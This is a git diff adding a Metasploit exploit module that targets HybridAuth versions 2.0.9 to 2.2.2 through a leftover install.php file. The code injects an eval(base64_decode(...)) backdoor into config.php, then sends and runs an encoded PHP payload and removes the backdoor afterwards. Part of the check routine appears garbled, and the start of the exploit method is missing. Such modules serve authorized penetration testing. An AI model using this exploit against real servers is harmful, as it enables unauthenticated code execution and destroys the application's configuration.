diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb new file mode 100644 index 0000000000..b72979dd10 --- /dev/null +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -0,0 +1,138 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking # application config.php is overwritten + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HybridAuth install.php PHP Code Execution', + 'Description' => %q{ + This module exploits a PHP code execution vulnerability in + HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php' + is not removed after installation allowing unauthenticated users to + write PHP code to the application configuration file 'config.php'. + + Note: This exploit will overwrite the application configuration file + rendering the application unusable. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pichaya Morimoto', # Discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'References' => + [ + ['EDB', '34273'], + ['OSVDB','109838'] + ], + 'Arch' => ARCH_PHP, + 'Platform' => 'php', + 'Targets' => + [ + # Tested: + # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu) + ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Aug 4 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/']) + ], self.class) + end + + + # + # Check: + # * install.php exists + # * config.php is writable + # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2 + # + def check + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') + if !res + vprint_error "#{peer} - Connection failed" + return Exploit::CheckCode::Unknown + elsif res.code == 404 + vprint_error "#{peer} - Could not find install.php" + elsif res.body =~ />([^<]+)<\/span> must be WRITABLEHybridAuth (2\.[012]\.[\d\.]+(-dev)?) InstallerHybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer 'POST', + 'uri' => normalize_uri(target_uri.path, 'install.php'), + 'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*" + ) + if !res + fail_with Failure::Unknown, "#{peer} - Connection failed" + elsif res.body =~ /Installation completed/ + print_good "#{peer} - Wrote backdoor successfully" + else + fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" + end + + # execute payload + code = Rex::Text.encode_base64(payload.encoded) + print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'config.php'), + 'data' => "#{payload_param}=#{code}" + }, 5) + if !res + print_warning "#{peer} - No response" + elsif res.code == 404 + fail_with Failure::NotFound, "#{peer} - Could not find config.php" + elsif res.code == 200 || res.code == 500 + print_good "#{peer} - Sent payload successfully" + end + + # remove backdoor + print_status "#{peer} - Removing backdoor from config.php" + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'install.php'), + 'data' => 'OPENID_ADAPTER_STATUS=' + ) + if !res + print_error "#{peer} - Connection failed" + elsif res.body =~ /Installation completed/ + print_good "#{peer} - Removed backdoor successfully" + else + print_warning "#{peer} - Could not remove payload from config.php" + end + end +end